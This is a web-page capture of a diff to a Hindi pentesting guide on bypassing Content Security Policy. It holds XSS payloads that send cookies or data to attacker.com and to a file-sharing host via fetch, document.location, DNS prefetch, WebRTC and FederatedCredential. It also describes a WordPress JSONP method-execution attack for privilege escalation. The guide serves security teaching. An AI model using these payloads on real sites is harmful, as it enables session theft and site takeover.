```javascript
 | 
			
		||||
a = window.open("/" + "x".repeat(4100))
 | 
			
		||||
setTimeout(function () {
 | 
			
		||||
@ -619,7 +598,7 @@ a.document.body.innerHTML = `<img src=x onerror="fetch('https://filesharing.m0le
 | 
			
		||||
```
 | 
			
		||||
### SOME + 'self' + wordpress
 | 
			
		||||
 | 
			
		||||
SOME एक तकनीक है जो एक XSS (या अत्यधिक सीमित XSS) **एक पृष्ठ के एंडपॉइंट में** का दुरुपयोग करती है ताकि **एक ही मूल के अन्य एंडपॉइंट्स का दुरुपयोग** किया जा सके। यह हमलावर पृष्ठ से कमजोर एंडपॉइंट को लोड करके और फिर हमलावर पृष्ठ को उसी मूल के वास्तविक एंडपॉइंट पर रिफ्रेश करके किया जाता है जिसे आप दुरुपयोग करना चाहते हैं। इस तरह **कमजोर एंडपॉइंट** **`opener`** ऑब्जेक्ट का उपयोग कर सकता है **पेलोड** में **DOM** तक **पहुँचने** के लिए **वास्तविक एंडपॉइंट का दुरुपयोग** करने के लिए। अधिक जानकारी के लिए देखें:
 | 
			
		||||
SOME एक तकनीक है जो एक XSS (या अत्यधिक सीमित XSS) **एक पृष्ठ के एंडपॉइंट में** का दुरुपयोग करती है ताकि **एक ही मूल के अन्य एंडपॉइंट्स का दुरुपयोग** किया जा सके। यह हमलावर पृष्ठ से कमजोर एंडपॉइंट को लोड करके और फिर हमलावर पृष्ठ को उसी मूल के वास्तविक एंडपॉइंट पर ताज़ा करके किया जाता है जिसे आप दुरुपयोग करना चाहते हैं। इस तरह **कमजोर एंडपॉइंट** **`opener`** ऑब्जेक्ट का उपयोग कर सकता है **पेलोड** में **DOM** तक **पहुँचने** के लिए **वास्तविक एंडपॉइंट का दुरुपयोग** करने के लिए। अधिक जानकारी के लिए देखें:
 | 
			
		||||
 | 
			
		||||
{{#ref}}
 | 
			
		||||
../xss-cross-site-scripting/some-same-origin-method-execution.md
 | 
			
		||||
@ -627,7 +606,7 @@ SOME एक तकनीक है जो एक XSS (या अत्यधि
 | 
			
		||||
 | 
			
		||||
इसके अलावा, **wordpress** में `/wp-json/wp/v2/users/1?_jsonp=data` पर एक **JSONP** एंडपॉइंट है जो आउटपुट में भेजे गए **डेटा** को **प्रतिबिंबित** करेगा (केवल अक्षरों, संख्याओं और बिंदुओं की सीमा के साथ)।
 | 
			
		||||
 | 
			
		||||
एक हमलावर उस एंडपॉइंट का दुरुपयोग करके **WordPress के खिलाफ एक SOME हमले** को **जनरेट** कर सकता है और इसे `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` के अंदर **एंबेड** कर सकता है, ध्यान दें कि यह **स्क्रिप्ट** **लोड** होगी क्योंकि इसे **'self' द्वारा अनुमति दी गई है**। इसके अलावा, और क्योंकि WordPress स्थापित है, एक हमलावर **कमजोर** **कॉलबैक** एंडपॉइंट के माध्यम से **SOME हमले** का दुरुपयोग कर सकता है जो **CSP को बायपास** करता है ताकि एक उपयोगकर्ता को अधिक विशेषाधिकार दिए जा सकें, एक नया प्लगइन स्थापित किया जा सके...\
 | 
			
		||||
एक हमलावर उस एंडपॉइंट का दुरुपयोग करके WordPress के खिलाफ **SOME हमले** को **जनरेट** कर सकता है और इसे `<script s`rc=`/wp-json/wp/v2/users/1?_jsonp=some_attack></script>` के अंदर **एंबेड** कर सकता है, ध्यान दें कि यह **स्क्रिप्ट** **लोड** होगी क्योंकि इसे **'self'** द्वारा **अनुमति** दी गई है। इसके अलावा, और क्योंकि WordPress स्थापित है, एक हमलावर **कमजोर** **कॉलबैक** एंडपॉइंट के माध्यम से **SOME हमले** का दुरुपयोग कर सकता है जो **CSP को बायपास** करता है ताकि एक उपयोगकर्ता को अधिक विशेषाधिकार दिए जा सकें, एक नया प्लगइन स्थापित किया जा सके...\
 | 
			
		||||
इस हमले को कैसे करना है, इसके बारे में अधिक जानकारी के लिए देखें [https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/](https://octagon.net/blog/2022/05/29/bypass-csp-using-wordpress-by-abusing-same-origin-method-execution/)
 | 
			
		||||
 | 
			
		||||
## CSP Exfiltration Bypasses
 | 
			
		||||
@ -643,7 +622,7 @@ document.location = "https://attacker.com/?" + sessionid
 | 
			
		||||
```
 | 
			
		||||
### Meta tag
 | 
			
		||||
 | 
			
		||||
आप एक मेटा टैग इंजेक्ट करके रीडायरेक्ट कर सकते हैं (यह सिर्फ एक रीडायरेक्ट है, यह सामग्री को लीक नहीं करेगा)
 | 
			
		||||
आप एक मेटा टैग इंजेक्ट करके रीडायरेक्ट कर सकते हैं (यह केवल एक रीडायरेक्ट है, यह सामग्री को लीक नहीं करेगा)
 | 
			
		||||
```html
 | 
			
		||||
<meta http-equiv="refresh" content="1; http://attacker.com" />
 | 
			
		||||
```
 | 
			
		||||
@ -652,7 +631,7 @@ document.location = "https://attacker.com/?" + sessionid
 | 
			
		||||
पृष्ठों को तेजी से लोड करने के लिए, ब्राउज़र होस्टनाम को IP पते में पूर्व-समाधान करने और उन्हें बाद में उपयोग के लिए कैश करने जा रहे हैं।\
 | 
			
		||||
आप एक ब्राउज़र को एक होस्टनाम को पूर्व-समाधान करने के लिए संकेत दे सकते हैं: `<link rel="dns-prefetch" href="something.com">`
 | 
			
		||||
 | 
			
		||||
आप इस व्यवहार का दुरुपयोग करके **DNS अनुरोधों के माध्यम से संवेदनशील जानकारी को निकाल सकते हैं**:
 | 
			
		||||
आप इस व्यवहार का दुरुपयोग करके **DNS अनुरोधों के माध्यम से संवेदनशील जानकारी को एक्सफिल्ट्रेट** कर सकते हैं:
 | 
			
		||||
```javascript
 | 
			
		||||
var sessionid = document.cookie.split("=")[1] + "."
 | 
			
		||||
var body = document.getElementsByTagName("body")[0]
 | 
			
		||||
@ -700,7 +679,20 @@ var pc = new RTCPeerConnection({
 | 
			
		||||
});
 | 
			
		||||
pc.createOffer().then((sdp)=>pc.setLocalDescription(sdp);
 | 
			
		||||
```
 | 
			
		||||
## CSP नीतियों की ऑनलाइन जांच करना
 | 
			
		||||
### CredentialsContainer
 | 
			
		||||
 | 
			
		||||
क्रेडेंशियल पॉपअप बिना पृष्ठ द्वारा प्रतिबंधित हुए iconURL पर एक DNS अनुरोध भेजता है। यह केवल एक सुरक्षित संदर्भ (HTTPS) या लोकलहोस्ट पर काम करता है।
 | 
			
		||||
```javascript
 | 
			
		||||
navigator.credentials.store(
 | 
			
		||||
new FederatedCredential({
 | 
			
		||||
id:"satoki",
 | 
			
		||||
name:"satoki",
 | 
			
		||||
provider:"https:"+your_data+"example.com",
 | 
			
		||||
iconURL:"https:"+your_data+"example.com"
 | 
			
		||||
})
 | 
			
		||||
)
 | 
			
		||||
```
 | 
			
		||||
## CSP नीतियों की ऑनलाइन जांच
 | 
			
		||||
 | 
			
		||||
- [https://csp-evaluator.withgoogle.com/](https://csp-evaluator.withgoogle.com)
 | 
			
		||||
- [https://cspvalidator.org/](https://cspvalidator.org/#url=https://cspvalidator.org/)
 | 
			
		||||
 | 
			
		||||
		Loading…
	
	
			
			x
			
			
		
	
		Reference in New Issue
	
	Block a user